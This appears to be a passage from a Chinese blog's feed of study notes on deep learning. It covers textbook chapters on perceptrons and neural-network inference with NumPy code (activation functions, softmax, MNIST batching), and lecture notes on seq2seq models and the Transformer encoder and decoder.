    上图表示神经元的○中明确显示了激活函数的计算过程,即信号的加权总和为节点 $a$,然后节点 $a$ 被激活函数 $h()$ 转换成节点 $y$。本书中,“神经元”和“节点”两个术语的含义相同。这里,我们称 $a$ 和 $y$ 为“节点”,其实它和之前所说的“神经元”含义相同。

    3.2 激活函数

    在激活函数的众多候选函数中,感知机使用了阶跃函数。那么,如果感知机使用其他函数作为激活函数的话会怎么样呢?实际上,如果将激活函数从阶跃函数换成其他函数,就可以进入神经网络的世界了。

    3.2.1sigmoid 函数

    神经网络中经常使用的一个激活函数:sigmoid 函数(sigmoid function)

    $$h(x)=\frac{1}{1+\exp(-x)}$$

    3.2.2 阶跃函数的实现

    1
    2
    3
    4
    5
    6
    def step_function(x):
    """
    阶跃函数(允许参数取 Numpy 数组的形式)
    """
    y = x > 0
    return y.astype(int)

    对 NumPy 数组进行不等号运算后,数组的各个元素都会进行不等号运算,生成一个布尔型数组。这里,数组 x 中大于 0 的元素被转换为 True,小于等
    于 0 的元素被转换为 False,从而生成一个新的数组 y。数组 y 是一个布尔型数组,但是我们想要的阶跃函数是会输出 int 型的 0 或 1 的函数。因此,需要把数组 y 的元素类型从布尔型转换为 int 型。

    1
    2
    3
    4
    5
    import numpy as np

    x = np.array([-1.0, 1.0, 2.0])
    y = x > 0
    y
    array([False,  True,  True])
    1
    2
    y = y.astype(int)
    y
    array([0, 1, 1])

    3.2.3 阶跃函数的图形

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    import numpy as np
    import matplotlib.pyplot as plt


    def strp_function(x):
    return np.array(x > 0, dtype=int)

    x = np.arange(-5.0, 5.0, 0.1)
    y = step_function(x)
    plt.plot(x, y)
    plt.ylim(-0.1, 1.1) # 指定 y 轴的范围
    plt.show()

    png

    3.2.4sigmoid 函数的实现

    1
    2
    def sigmoid(x):
    return 1 / (1 + np.exp(-x))
    1
    2
    x = np.array([-1.0, 1.0, 2.0])
    sigmoid(x) # 根据 NumPy 的广播功能,如果在标量和 NumPy 数组之间进行运算,则标量会和 NumPy 数组的各个元素进行运算。
    array([0.26894142, 0.73105858, 0.88079708])
    1
    2
    3
    4
    5
    x = np.arange(-5.0, 5.0, 0.1)
    y = sigmoid(x)
    plt.plot(x, y)
    plt.ylim(-0.1, 1.1)
    plt.show()

    png

    3.2.6 非线性函数

    • 神经网络的激活函数必须使用非线性函数。

      • 使用线性函数的话,加深神经网络的层数就没有意义了。

      • 为了发挥叠加层所带来的优势,激活函数必须使用非线性函数。

    3.2.7 ReLU 函数

    在神经网络发展的历史上,sigmoid 函数很早就开始被使用了,而最近则主要使用**ReLU(Rectified Linear Unit)**函数。

    $$h(x)=\left{\begin{matrix}x\quad(x>0)\0\quad(x\le0)\end{matrix}\right.$$

    1
    2
    def relu(x):
    return np.maximum(0, x)
    1
    2
    3
    4
    5
    x = np.arange(-5.0, 5.0, 0.1)
    y = relu(x)
    plt.plot(x, y)
    plt.ylim(-0.1, 5)
    plt.show()

    png

    3.3 多维数组的运算

    3.3.3 神经网络的内积

    png

    上图中的简单神经网络为对象。这个神经网络省略了偏置和激活函数,只有权重。

    $$\mathbf{W} = \begin{pmatrix} 1 & 3 & 5\ 2 & 4 & 6 \end{pmatrix}$$

    实现该神经网络时,要注意 $\mathbf{X}$、$\mathbf{W}$、$\mathbf{Y}$ 的形状,特别是 $\mathbf{X}$ 和 $\mathbf{W}$ 的对应
    维度的元素个数是否一致,这一点很重要。

    1
    2
    3
    4
    X = np.array([1, 2])
    W = np.array([[1, 3, 5], [2, 4, 6]])
    Y = np.dot(X, W)
    Y
    array([ 5, 11, 17])

    使用np.dot(多维数组的点积),可以一次性计算出 $\mathbf{Y}$ 的结果。
    这意味着,即便 $\mathbf{Y}$ 的元素个数为 100 或 1000,也可以通过一次运算就计算出结果!如果不使用 np.dot,就必须单独计算 $\mathbf{Y}$ 的每一个元素(或者说必须使用for语句),非常麻烦。因此,通过矩阵的乘积一次性完成计算的技巧,在实现的层面上可以说是非常重要的。

    3.4 3 层神经网络的实现

    3.4.1 符号确认

    png

    3.4.2 各层间信号传递的实现

    $$a{(1)}_1=w{(1)}_{11}x_1+w{(1)}_{12}x_2+b{(1)}_1$$

    如果使用矩阵的乘法运算,则可以将第 1 层的加权和表示成下面的式:

    $$\mathbf{A}{(1)}=\mathbf{XW}{(1)}+\mathbf{B}^{(1)}$$

    其中,$\mathbf{A}{(1)}$、$\mathbf{X}$、$\mathbf{B}{(1)}$、$\mathbf{W}^{(1)}$ 如下所示:

    $\mathbf A^{(1)}=\begin{pmatrix} a^{(1)}_1 & a^{(1)}_2 & a^{(1)}_3 \end{pmatrix}$,$\mathbf{X} = \begin{pmatrix} x_1 & x_2 \end{pmatrix}$, $\mathbf{B}^{(1)} = \begin{pmatrix} b^{(1)}_1 & b^{(1)}_2 & b^{(1)}_3 \end{pmatrix}$

    $\mathbf{W}^{(1)} = \begin{pmatrix} w^{(1)}{11} & w^{(1)}{21} & w^{(1)}{31} \ w^{(1)}{12} & w^{(1)}{22} & w^{(1)}{32}\end{pmatrix}$

    输入层到第 1 层的信号传递:

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    import numpy as np

    X = np.array([1.0, 0.5])
    W1 = np.array([[0.1, 0.3, 0.5], [0.2, 0.4, 0.6]])
    B1 = np.array([[0.1, 0.2, 0.3]])

    print(W1.shape)
    print(X.shape)
    print(B1.shape)
    (2, 3)(2,)(1, 3)
    1
    2
    A1 = np.dot(X, W1) + B1
    A1
    array([[0.3, 0.7, 1.1]])
    1
    2
    Z1 = sigmoid(A1)
    Z1
    array([[0.57444252, 0.66818777, 0.75026011]])

    实现第 1 层到第 2 层的信号传递:

    png

    1
    2
    3
    4
    5
    6
    W2 = np.array([[0.1, 0.4], [0.2, 0.5], [0.3, 0.6]])
    B2 = np.array([0.1, 0.2])

    print(Z1.shape)
    print(W2.shape)
    print(B2.shape)
    (1, 3)(3, 2)(2,)
    1
    2
    A2 = np.dot(Z1, W2) + B2
    Z2 = sigmoid(A2)

    实现第 2 层到输出层的信号传递:

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    def identity_function(x):
    """
    这里我们定义了 identity_function()函数(也称为“恒等函数”),并将
    其作为输出层的激活函数。恒等函数会将输入按原样输出,因此,这个例子
    中没有必要特意定义 identity_function()。这里这样实现只是为了和之前的
    流程保持统一。
    """
    return x

    W3 = np.array([[0.1, 0.3], [0.2, 0.4]])
    B3 = np.array([0.1, 0.2])

    A3 = np.dot(Z2, W3) + B3
    Y = identity_function(A3) # 或 Y = A3

    输出层的激活函数用 $\sigma()$ 表示,不同于隐藏层的激活函数 $h()$。

    输出层所用的激活函数,要根据求解问题的性质决定。

    • 一般地,回归问题可以使用恒等函数,二元分类问题可以使用 sigmoid 函数

    • 多元分类问题可以使用 softmax 函数

    3.4.3 代码实现小结

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    def init_network():
    """
    按照神经网络的实现惯例,只把权重记为大写字母 W1,其他的(偏置或中间结果等)都用小写字母表示。
    """
    network = {}
    network['W1'] = np.array([[0.1, 0.3, 0.5], [0.2, 0.4, 0.6]])
    network['b1'] = np.array([0.1, 0.2, 0.3])
    network['W2'] = np.array([[0.1, 0.4], [0.2, 0.5], [0.3, 0.6]])
    network['b2'] = np.array([0.1, 0.2])
    network['W3'] = np.array([[0.1, 0.3], [0.2, 0.4]])
    network['b3'] = np.array([0.1, 0.2])

    return network


    def forward(network, x):
    """
    表示的是从输入到输出方向的传递处理
    """
    W1, W2, W3 = network['W1'], network['W2'], network['W3']
    b1, b2, b3 = network['b1'], network['b2'], network['b3']
    a1 = np.dot(x, W1) + b1
    z1 = sigmoid(a1)
    a2 = np.dot(z1, W2) + b2
    z2 = sigmoid(a2)
    a3 = np.dot(z2, W3) + b3
    y = identity_function(a3)
    return y


    network = init_network()
    x = np.array([1.0, 0.5])
    y = forward(network, x)
    print(y)
    [0.31682708 0.69627909]

    3.5 输出层的设计

    3.5.1 恒等函数和 softmax 函数

    $$y_k=\frac{\exp(x_k)}{\sum^n_{i=1}\exp(a_i)}$$

    1
    2
    3
    4
    5
    6
    def softmax(a):
    exp_a = np.exp(a)
    sum_exp_a = np.sum(exp_a)
    y = exp_a / sum_exp_a

    return y

    3.5.2 实现 softmax 函数时的注意事项

    由于要进行指数函数的运算,可能会导致溢出。

    进行改进:

    $$
    \begin{eqnarray}
    y_k &= \frac{\exp(a_k)}{\sum^n_{i=1}\exp(a_i)} &= \frac{C\exp(a_k)}{C\sum^n_{i=1}\exp(a_i)} \
    & &=\frac{\exp(a_k+\log C)}{\sum^n_{i=1}\exp(a_i+\log C)} \
    & &=\frac{\exp(a_k+C’)}{\sum^n_{i=1}\exp(a_i+C’)}
    \end{eqnarray}
    $$

    其中 $C$ 任意的常数,记 $\log C=C’$,这里的 $C’$ 可以使用任何值,但是为了防止溢出,一般会使用输入信号中的最大值。

    1
    2
    a = np.array([1010, 1000, 990])
    np.exp(a) / np.sum(np.exp(a))
    C:\Users\gzjzx\AppData\Local\Temp\ipykernel_15664\832863605.py:2: RuntimeWarning: overflow encountered in exp  np.exp(a) / np.sum(np.exp(a))C:\Users\gzjzx\AppData\Local\Temp\ipykernel_15664\832863605.py:2: RuntimeWarning: invalid value encountered in true_divide  np.exp(a) / np.sum(np.exp(a))array([nan, nan, nan])
    1
    2
    c = np.max(a)
    a - c
    array([  0, -10, -20])
    1
    np.exp(a-c) / np.sum(np.exp(a-c))
    array([9.99954600e-01, 4.53978686e-05, 2.06106005e-09])

    综上,我们可以像下面这样实现 softmax 函数。

    1
    2
    3
    4
    5
    6
    def softmax(a):
    c = np.max(a)
    exp_a = np.exp(a - c) # 溢出对策
    sum_exp_a = np.sum(exp_a)
    y = exp_a / sum_exp_a
    return y

    3.5.3softmax 函数的特征

    1
    2
    3
    a = np.array([0.3, 2.9, 4.0])
    y = softmax(a)
    y
    array([0.01821127, 0.24519181, 0.73659691])
    1
    np.sum(y)
    1.0
    • softmax 函数的输出是 0.0 到 1.0 之间的实数
    • softmax 函数的输出值的总和是 1

    3.5.4 输出层的神经元数量

    png

    输出层的神经元数量需要根据待解决的问题来决定。对于分类问题,输出层的神经元数量一般设定为类别的数量。

    3.6 手写数字识别

    假设学习已经全部结束,我们使用学习到的参数,先实现神经网络的“推理处理”。这个推理处理也称为神经网络的前向传播(forward propagation)

    3.6.1 MNIST 数据集

    MNIST 的图像数据是 28 像素× 28 像素的灰度图像(1 通道),各个像素的取值在 0 到 255 之间。每个图像数据都相应地标有“7”“2”“1”等标签。

    本书提供了便利的 Python 脚本 mnist.py,该脚本支持从下载 MNIST 数据
    集到将这些数据转换成 NumPy 数组等处理(mnist.py 在 dataset 目录下)。使用
    mnist.py 时,当前目录必须是 ch01、ch02、ch03、…、ch08 目录中的一个。使
    mnist.py 中的 load_mnist()函数,就可以按下述方式轻松读入 MNIST 数据。

    1
    2
    3
    4
    5
    6
    7
    import sys, os
    sys.path.append(os.pardir) # 为了导入父目录中的文件而进行的设定
    from dataset.mnist import load_mnist

    # 第一次调用会花费几分钟……
    # load_mnist 函数以“( 训练图像, 训练标签),( 测试图像,测试标签)”的形式返回读入的 MNIST 数据
    (x_train, t_train), (x_test, t_test) = load_mnist(flatten=True, normalize=False)
    Downloading train-images-idx3-ubyte.gz ... DoneDownloading train-labels-idx1-ubyte.gz ... DoneDownloading t10k-images-idx3-ubyte.gz ... DoneDownloading t10k-labels-idx1-ubyte.gz ... DoneConverting train-images-idx3-ubyte.gz to NumPy Array ...DoneConverting train-labels-idx1-ubyte.gz to NumPy Array ...DoneConverting t10k-images-idx3-ubyte.gz to NumPy Array ...DoneConverting t10k-labels-idx1-ubyte.gz to NumPy Array ...DoneCreating pickle file ...Done!
    1
    2
    3
    4
    5
    # 输出各个数据的形状
    print(x_train.shape) # (60000, 784)
    print(t_train.shape) # (60000,)
    print(x_test.shape) # (10000, 784)
    print(t_test.shape) # (10000,)
    (60000, 784)(60000,)(10000, 784)(10000,)

    试着显示 MNIST 图像,同时也确认一下数据

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    import sys, os
    sys.path.append(os.pardir)
    import numpy as np
    from dataset.mnist import load_mnist
    from PIL import Image
    import matplotlib.pyplot as plt


    def img_show(img):
    pil_img = Image.fromarray(np.uint8(img))
    pil_img.show()

    (x_train, t_train), (x_test, t_test) = load_mnist(flatten=True, normalize=False)
    img = x_train[0]
    label = t_train[0]
    print(label) # 5

    print(img.shape) # (784,)
    img = img.reshape(28, 28) # 把图像的形状变成原来的尺寸
    print(img.shape) # (28, 28)
    plt.imshow(img, cmap='gray')
    5(784,)(28, 28)<matplotlib.image.AxesImage at 0x1f5a63afca0>

    png

    3.6.2 神经网络的推理处理

    对这个 MNIST 数据集实现神经网络的推理处理。
    神经网络的输入层有 784 个神经元,输出层有 10 个神经元。

    • 输入层的 784 这个数字来源于图像大小的 28 × 28 = 784

    • 输出层的 10 这个数字来源于 10 类别分类(数字 0 到 9,共 10 类别)

    • 这个神经网络有 2 个隐藏层,第 1 个隐藏层有 50 个神经元,第 2 个隐藏层有 100 个神经元。这个 50 和 100 可以设置为任何值。

    1
    2
    3
    4
    5
    6
    7
    def get_data():
    """
    获取数据
    """
    (x_train, t_train), (x_test, t_test) = \
    load_mnist(normalize=True, flatten=True, one_hot_label=False)
    return x_test, t_test

    将 normalize 设置成True后,函数内部会进行转换,将图像的各个像素值除以 255,使得数据的值在 0.0~1.0 的范围内。像这样把数据限定到某个范围内的处理称为正规化(normalization)。此外,对神经网络的输入数据进行某种既定的转换称为预处理(pre-processing)
    这里,作为对输入图像的一种预处理,我们进行了正规化。

    1
    2
    3
    4
    5
    6
    7
    8
    def init_network():
    """
    读入保存在 pickle 文件 sample_weight.pkl 中的学习到的权重参数
    这个文件中以字典变量的形式保存了权重和偏置参数
    """
    with open("sample_weight.pkl", 'rb') as f:
    network = pickle.load(f)
    return network
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    def predict(network, x):
    """
    前向传播
    """
    W1, W2, W3 = network['W1'], network['W2'], network['W3']
    b1, b2, b3 = network['b1'], network['b2'], network['b3']
    a1 = np.dot(x, W1) + b1
    z1 = sigmoid(a1)
    a2 = np.dot(z1, W2) + b2
    z2 = sigmoid(a2)
    a3 = np.dot(z2, W3) + b3
    y = softmax(a3)

    return y
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    import pickle

    x, t = get_data()
    network = init_network()

    accuracy_cnt = 0
    for i in range(len(x)):
    """
    用 for 语句逐一取出保存在 x 中的图像数据,用 predict()函数进行分类。
    predict()函数以 NumPy 数组的形式输出各个标签对应的概率。
    """
    y = predict(network, x[i])
    p = np.argmax(y) # 获取概率最高的元素的索引
    if p == t[i]:
    accuracy_cnt += 1

    print("Accuracy: " + str(float(accuracy_cnt) / len(x)))
    Accuracy:0.9352

    3.6.3 批处理

    输出刚才的神经网络的各层的权重的形状。

    1
    2
    3
    x, _ = get_data()
    network = init_network()
    W1, W2, W3 = network['W1'], network['W2'], network['W3']
x.shape
(10000, 784)

x[0].shape
(784,)

W1.shape
(784, 50)

W2.shape
(50, 100)

W3.shape
(100, 10)

    从整体的处理流程来看,图 3-26 中,输入一个由 784 个元素(原本是一个 28 × 28 的二维数组)构成的一维数组后,输出一个有 10 个元素的一维数组。这是只输入一张图像数据时的处理流程。

    png

现在我们来考虑打包输入多张图像的情形。比如,我们想用 predict() 函数一次性打包处理 100 张图像。为此,可以把 $\mathbf{x}$ 的形状改为 100 × 784,将 100 张图像打包作为输入数据。

    png

    这种打包式的输入数据称为批(batch)。批有“捆”的意思,图像就如同纸币一样扎成一捆。
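
在看具体代码前,可以先验证一下批处理前后的形状变化。下面是一个只看形状的最小示意(忽略偏置与激活函数,权重用随机数代替,仅用于确认维度):

import numpy as np

x_batch = np.random.rand(100, 784)  # 100 张展开后的图像打包成一批
W1 = np.random.rand(784, 50)
W2 = np.random.rand(50, 100)
W3 = np.random.rand(100, 10)
y_batch = x_batch @ W1 @ W2 @ W3  # 形状沿 (100,784)->(100,50)->(100,100)->(100,10) 变化
print(y_batch.shape)  # (100, 10):每张图像对应 10 个类别的得分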

x, t = get_data()
network = init_network()

batch_size = 100  # 批数量
accuracy_cnt = 0

for i in range(0, len(x), batch_size):
    # 在 range() 函数生成的序列的基础上,通过 x[i:i+batch_size] 从输入数据中抽出批数据。
    # x[i:i+batch_size] 会取出从第 i 个到第 i+batch_size 个之间的数据。
    x_batch = x[i:i+batch_size]
    y_batch = predict(network, x_batch)
    # 参数 axis=1 指定了在 100 × 10 的数组中,沿着第 1 维方向(以第 1 维为轴)
    # 找到值最大的元素的索引(维度的索引从 0 开始计数)。
    p = np.argmax(y_batch, axis=1)
    accuracy_cnt += np.sum(p == t[i:i+batch_size])

print("Accuracy: " + str(float(accuracy_cnt) / len(x)))
Accuracy: 0.9352

    3.7 小结

    • 神经网络中的激活函数使用平滑变化的 sigmoid 函数或 ReLU 函数。

    • 通过巧妙地使用 NumPy 多维数组,可以高效地实现神经网络。

    • 机器学习的问题大体上可以分为回归问题和分类问题。

    • 关于输出层的激活函数,回归问题中一般用恒等函数,分类问题中一般用 softmax 函数。

    • 分类问题中,输出层的神经元的数量设置为要分类的类别数。

    • 输入数据的集合称为批。通过以批为单位进行推理处理,能够实现高速的运算。

    ]]>
    @@ -8225,7 +8225,7 @@ /posts/DL-%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-%E5%9F%BA%E4%BA%8EPython%E7%9A%84%E7%90%86%E8%AE%BA%E4%B8%8E%E5%AE%9E%E7%8E%B0-2-%E6%84%9F%E7%9F%A5%E6%9C%BA/ - 正文

    + 正文

    2.1 感知机是什么

    • 接收多个输入信号,输出一个信号。
    • 感知机的信号只有“流/ 不流”(1/0)两种取值。在本书中,0 对应“不传递信号”,1 对应“传递信号”。

    png

    一个接收两个输入信号的感知机的例子。$x_1$、$x_2$ 是输入信号,$y$ 是输出信号,$w_1$、$w_2$ 是权重($w$ 是 weight 的首字母)。图中的○称为“神经元”或者“节点”。输入信号被送往神经元时,会被分别乘以固定的权重($w_1x_1$、$w_2x_2$)。神经元会计算传送过来的信号的总和,只有当这个总和超过了某个界限值时,才会输出 1。这也称为“神经元被激活”。这里将这个界限值称为阈值,用符号 $\theta$ 表示。

    用数学式来表示:

$$y=\begin{cases}0 & (w_1x_1+w_2x_2\le\theta)\\ 1 & (w_1x_1+w_2x_2>\theta)\end{cases}$$

感知机的多个输入信号都有各自固有的权重($w_1$、$w_2$),这些权重发挥着控制各个信号重要性的作用。也就是说,权重越大,对应该权重的信号的重要性就越高。

权重相当于电流里所说的电阻。电阻是决定电流流动难度的参数,电阻越低,通过的电流就越大。而感知机的权重则是值越大,通过的信号就越大。不管是电阻还是权重,在控制信号流动难度(或者流动容易度)这一点上的作用都是一样的。

    2.3 感知机的实现

    2.3.1 简单的实现

def AND(x1, x2):
    """
    模拟一个 AND 门
    """
    w1, w2, theta = 0.5, 0.5, 0.7  # 接受参数 w1 = 0.5, w2 = 0.5, 阈值为 0.7
    tmp = x1 * w1 + x2 * w2
    if tmp <= theta:
        return 0
    elif tmp > theta:
        return 1
    print(AND(0, 0))
    print(AND(1, 0))
    print(AND(0, 1))
    print(AND(1, 1))
0
0
0
1

    2.3.2 导入权重和偏置

    导入权重和偏置, 把 $\theta$ 换成 $-b$:

$$y=\begin{cases}0 & (b+w_1x_1+w_2x_2\le 0)\\ 1 & (b+w_1x_1+w_2x_2>0)\end{cases}$$

    此处,$b$ 称为偏置,$w_1$ 和 $w_2$ 称为权重。感知机会计算输入信号和权重的乘积,然后加上偏置,如果这个值大于 0 则输出 1,否则输出 0。

    import numpy as np

    x = np.array([0, 1]) # 输入
    w = np.array([0.5, 0.5]) # 权重
    b = -0.7 # 偏置
    w * x
    array([0. , 0.5])
np.sum(w * x)
0.5

np.sum(w * x) + b  # 大约为 -0.2(由浮点小数造成的运算误差)
-0.19999999999999996

    2.3.3 使用权重和偏置的实现

def AND(x1, x2):
    x = np.array([x1, x2])
    w = np.array([0.5, 0.5])
    b = -0.7
    tmp = np.sum(w * x) + b
    if tmp <= 0:
        return 0
    else:
        return 1
    print(AND(0, 0))
    print(AND(1, 0))
    print(AND(0, 1))
    print(AND(1, 1))
0
0
0
1

    偏置的值决定了神经元被激活的容易程度。这里我们将 $w_1$ 和 $w_2$ 称为权重,将 $b$ 称为偏置,但是根据上下文,有时也会将 $b$、$w_1$、$w_2$ 这些参数统称为权重(将 1 也视为输入,$b$ 是调整神经元被激活的容易程度(输出信号为 1 的程度)的参数)。

def NAND(x1, x2):
    """
    模拟一个与非门(NAND)
    """
    x = np.array([x1, x2])
    w = np.array([-0.5, -0.5])  # 仅权重和偏置与 AND 不同!
    b = 0.7
    tmp = np.sum(w * x) + b
    if tmp <= 0:
        return 0
    else:
        return 1
    print(NAND(0, 0))
    print(NAND(1, 0))
    print(NAND(0, 1))
    print(NAND(1, 1))
1
1
1
0
def OR(x1, x2):
    """
    模拟一个或门
    """
    x = np.array([x1, x2])
    w = np.array([0.5, 0.5])  # 仅权重和偏置与 AND 不同!
    b = -0.2
    tmp = np.sum(w * x) + b
    if tmp <= 0:
        return 0
    else:
        return 1
    print(OR(0, 0))
    print(OR(1, 0))
    print(OR(0, 1))
    print(OR(1, 1))
0
1
1
1

    2.4 感知机的局限性

单层感知机无法解决异或问题:异或的 0/1 输出无法用一条直线把平面上的输入点分成两类,也就是说它不是线性可分的。

    2.5 多层感知机

    2.5.1 已有门电路的组合

    png

    png

    2.5.2 异或门的实现

def XOR(x1, x2):
    """
    使用之前定义的 AND 函数、NAND 函数、OR 函数,实现 XOR 门。
    """
    s1 = NAND(x1, x2)
    s2 = OR(x1, x2)
    y = AND(s1, s2)
    return y
    print(XOR(0, 0))
    print(XOR(1, 0))
    print(XOR(0, 1))
    print(XOR(1, 1))
0
1
1
0

实际上,与门、或门是单层感知机,而异或门是 2 层感知机。叠加了多层的感知机也称为多层感知机(multi-layered perceptron)。

    png

    上图的感知机总共由 3 层构成,但是因为拥有权重的层实质上只有 2 层(第 0 层和第 1 层之间,第 1 层和第 2 层之间),所以称为“2 层感知机”。不过,有的文献认为上图的感知机是由 3 层构成的,因而将其称为“3 层感知机”。

    2.7 小结

• 感知机是具有输入和输出的算法。给定一个输入后,将输出一个既定的值。
    • 感知机将权重和偏置设定为参数。
    • 使用感知机可以表示与门和或门等逻辑电路。
    • 异或门无法通过单层感知机来表示。
    • 使用 2 层感知机可以表示异或门。
    • 单层感知机只能表示线性空间,而多层感知机可以表示非线性空间。
    • 多层感知机(在理论上)可以表示计算机。
    ]]>
    @@ -8379,7 +8379,7 @@ /posts/ML-%E6%9D%8E%E5%AE%8F%E6%AF%85-Lecture%205-Sequence%20to%20sequence/ - Preparation

    + Preparation

    ##【機器學習 2021】Transformer -上-

    Transformer 是 2017 年引入的深度学习模型,主要用于自然语言处理领域。与循环神经网络一样,Transformers 旨在处理顺序数据(例如自然语言),以执行翻译和文本摘要等任务。但是,与 RNN 不同,Transformers 不需要按顺序处理顺序数据。

    png

    Seq2seq 问题:输入一个序列,输出一个序列,输出序列的长度由模型决定。

    • Speech Recognition:输入一段语音 T,输出对应的文字 N。
• Machine Translation:输入一段文字 N,输出另一种语言的文字 N’。
    • Speech Translation:输入一段语音(这段语音使用的语言可能没有对应的文字),输出另一种语言的文字。
      • 对于有文字的语言,可以将 Speech Recognition 和 Machine Translation 结合成 Speech Translation,但是没有文字的语言就不行。

    png

    ​ 尝试使用 1500 小时的乡土剧(台语声音,中文字幕)做数据集,让机器试着听台语输出中文。

    png

    ​ 不考虑训练集中 BGM、噪音、翻译文本的噪声、台语的口音等的因素。

    png

    ​ 最后也能得到差强人意的效果。

    png

​ Taiwanese Speech Synthesis:把语音辨识反过来,即语音合成:输入文本,输出台语语音的项目。

    png

    ​ Seq2seq model 用在聊天模型中。

    png

    ​ 把所有对话问题(各式各样的 NLP 问题)当作 QA 问题,用 seq2seq 模型解决。输入 question,context,输出 answer。

    png

    ​ 将 seq2seq 模型用在文法分析 Syntactic Parsing 中:输入一句话,输出这句话的语法成分(将语法成分看作用序列表示的一棵树)。

    png

    png

​ 用在多标签分类问题(同一个对象可能属于多个分类):输入一篇文章,输出若干个 class(个数由机器自己决定)。

    png

    ​ 用在目标检测(看似没有关系,但是可以用 seq2seq 硬做)

    png

    ​ 在 2014 年,就提出了 Seq2seq 模型(不过时间比较久远,模型比较旧):[1409.3215] Sequence to Sequence Learning with Neural Networks (arxiv.org)。由两个 RNN 分别组成了 Encoder、Decoder,可以应用于机器翻译。

    png

​ 今天典型的 seq2seq model:Transformer [1706.03762] Attention Is All You Need (arxiv.org)

    一般的 seq2seq model 会分成两块:Encoder(负责处理 input 的 seq)、Decoder(决定输出什么样的 seq)

    Encoder

    png

    png

    ​ 在 seq2seq 模型中的 Encoder 要做的事情就是 输入一排向量,输出另一排向量。能实现输入一排向量,输出一排向量功能的模型有 Self-attention、CNN 和 RNN 等模型,而 Transformer 中用到的则是 Multi-Head attention 模型

    png

    ​ Transformer 中有 N 个 Block,每个 Block 中包含了 Multi-Head Attention 和 Fully Connected 的 Feed Forward Network。

    • 先做一个 self-attention,输入一排向量,经过 self-attention 考虑整个 sequence 的信息后,输出另外一排向量。
    • 接下来将输出的这一排向量输入到 fully connected 的前馈网络中,得到处理后的向量,就是 Block 的输出。

    png

    ​ Transformer 引入了 residual connection,直接把 input 的 $a$ 和 output 的 $b$ 加起来得到新的 vector,再进行 layer normalization,得到 self-attention 的输出(FC 网络的输入)。

    ​ 在 fully connected 中也增加了同样的 residual 网络结构,FC 网络的输出先直接加上它对应的输入,然后经过 layer normalization 之后才是 FC 网络最终的输出。

    Layer Norm:

$$x'_i=\frac{x_i-m}{\sigma}$$
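
​ 下面是 Layer Norm 的最小示意(向量是随意取的,按上式对同一个向量自身做标准化):

import numpy as np

x = np.array([1.0, 2.0, 3.0, 4.0])  # 假设的一个输入向量
m, sigma = x.mean(), x.std()  # 对同一个向量自身求均值 m 和标准差 sigma
x_norm = (x - m) / sigma
print(x_norm.round(3))  # 标准化后该向量均值为 0、标准差为 1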

    png

​ BERT 就使用了 Transformer 的 Encoder。

    Encoder 总结

    • 在将输入向量进行 self-attention 之前,先加上 Positional Encoding,也就是输入向量中的位置信息。

    • Multi-Head Attention:进行 Multi-Head 的 self-attention 处理得到输出向量。

    • Add & Norm (residual & layer normalization): 也就是将 self-attention 的输出加上它对应的输入然后对其进行 Layer Normalization。

    • Feed Forward:将上一层的输出输入到 fully connected Network 中,将得到的输出向量和对应的输入向量同样经过 residual & layer normalization 操作后得到该 block 的最终输出。

    • 将这个 block 重复 n 次。

    png

    尝试对原始的 transformer 的改进:[2002.04745] On Layer Normalization in the Transformer Architecture (arxiv.org)

    为什么说要用 layer normalization 而不是 batch normalization:[2003.07845] PowerNorm: Rethinking Batch Normalization in Transformers (arxiv.org)

    ##【機器學習 2021】Transformer -下-

Decoder 分为 Autoregressive(AT)和 Non-Autoregressive(NAT)两种。其中 AT 应用范围更为广泛一些。

    Decoder-Autoregressive (AT)

    png

    png

    ​ 以 Speech Recognition 为例,从一段音频文件转换为文字序列。先由 Encoder 将这段音频变成一排 vector,再由 Decoder 将这排 vector 变成一段文字。每一个文字(Token)都用一个独热编码的向量表示(如果是英文,会更复杂)。BEGIN 和 END 被作为特殊的 Token。

    • 在 Encoder 完成之后,将其输出作为一个输入喂到 Decoder 中。

    • 同时,输入一个 special token:BEGIN 表示开始工作。

    • Decoder 结合这两个输入,输出一个经过 softmax 处理后的长度为 Vocabulary Size 的输出向量(是个概率分布),该向量中每一个中文字都对应一个数值,数值最大的中文字为最终输出的中文字,下图中,输出的结果是“机”。

    png

​ 接下来将“机”作为 Decoder 的输入,输出“器”,依此法得到“学”和“习”。(Decoder 会把自己前一步的输出当作接下来的输入)

    png

    ​ Decoder 的结构。

    png

​ 与 Encoder 相比,Decoder 的每一个 block 多了中间的一个 Multi-Head Attention,同时第一个自注意力机制使用的是 Masked Multi-Head Attention。
    png

    Masked Self-attention 与 Self-attention 的不同

​ Masked Self-attention 的计算顺序其实是和 Decoder 的串行计算顺序相对应的,以上图中计算 $b^2$ 为例:在计算 $b^2$ 的时候,和原来的 Self-attention 考虑所有输入信息 $[a^1,a^2,a^3,a^4]$ 不同,Masked Self-attention 只考虑 $[a^1,a^2]$,因为此时的 $[a^3,a^4]$ 还没有计算出来。
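
​ 下面用 NumPy 给一个 mask 逻辑的最小示意(Q、K 为随机数,仅演示上三角遮罩如何挡住“右边”的位置):

import numpy as np

N, d = 4, 8  # 序列长度、向量维度
Q, K = np.random.rand(N, d), np.random.rand(N, d)
scores = Q @ K.T / np.sqrt(d)  # (N, N) 的 attention 分数
mask = np.triu(np.ones((N, N), dtype=bool), k=1)  # 上三角为 True:代表“未来”的位置
scores[mask] = -np.inf  # 计算第 i 个输出时只允许看到前 i 个输入
weights = np.exp(scores) / np.exp(scores).sum(axis=1, keepdims=True)
print(weights.round(2))  # 第 i 行只有前 i 个位置非零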

    Why masked?

​ Encoder 是知道所有的 $a$ 的,所以使用 Self-attention;而 Decoder 需要把前一个输出作为输入,不知道所有的 $a$(只能考虑左边的东西,不能考虑右边的东西),所以使用 Masked Multi-Head Attention。

    png

    png

    Decoder 无法知道最终输出的长度?

​ 加入一个表示结束的 special token(END),机器输出它时就会停止。

    png

